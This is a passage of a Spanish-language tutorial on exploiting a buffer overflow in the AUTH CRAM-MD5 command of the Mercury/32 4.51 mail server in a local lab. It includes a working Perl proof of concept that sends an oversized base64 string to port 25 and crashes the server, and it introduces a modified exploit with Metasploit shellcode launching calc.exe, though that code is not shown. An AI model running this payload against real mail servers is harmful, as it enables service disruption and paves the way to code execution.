Explotación del desbordamiento del búfer en AUTH CRAM-MD5

Para llevar a cabo esta explotación es necesario descargar Mercury/32 Mail Transporter System en su versión 4.51, la cuál es propensa a la vulnerabilidad descrita anteriormente.


En todo momento y a lo largo de esta instalación, se mantendrán los valores que vienen asignados por defecto bajo el sistema operativo Microsoft Windows.


Una vez instalado iniciamos el servidor ejecutando el archivo mercury.exe que se encontrará, por defecto, en C:\MERCURY\.


Al ejecutarlo, se abrirá una ventana que a su vez contendrá dos pequeñas ventanas. Nosotros nos centraremos en la que aparece en primer plano y tiene como título Mercury SMTP Server. En esta ventana se mostrarán las conexiones actuales y los comandos introducidos por el usuario.

Para comprobar que el servidor se encuentra operativo, nos conectaremos al puerto 25 localmente mediante cualquier herramienta tipo telnet o netcat:


En caso de no recibir una respuesta es por que algún intermediario bloquea la conexión y/o por que estamos estableciendo la conexión remotamente.

Teniendo ya el servidor de correo operativo, podremos realizar una pequeña prueba con el siguiente código, el cuál generará una petición AUTH CRAM-MD5 de 10.000 caracteres, causando el cierre inesperado del servidor de correo Mercury.

use IO::Socket;
use MIME::Base64;
$|=1;
$host = "localhost";
$a = "QUFB" x 10000;
my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => '25', Proto => 'tcp');
print $sock "EHLO you\r\n";
print $sock "AUTH CRAM-MD5\r\n";
print $sock $a . "\r\n";
while(<$sock>) {
print;
}

Pasando a algo más peligroso y preocupante, empezaremos a trabajar con el siguiente exploit, que es una pequeña modificación del Exploit I, al que se hizo referencia anteriormente. Las modificaciones han sido realizadas por mí, para que el código pueda ser compilado correctamente con Dev-C++ v4.9.9.2, y su shellcode ha sido cambiada por una, generada por metasploit, que ejecuta el archivo calc.exe (calculadora de Windows).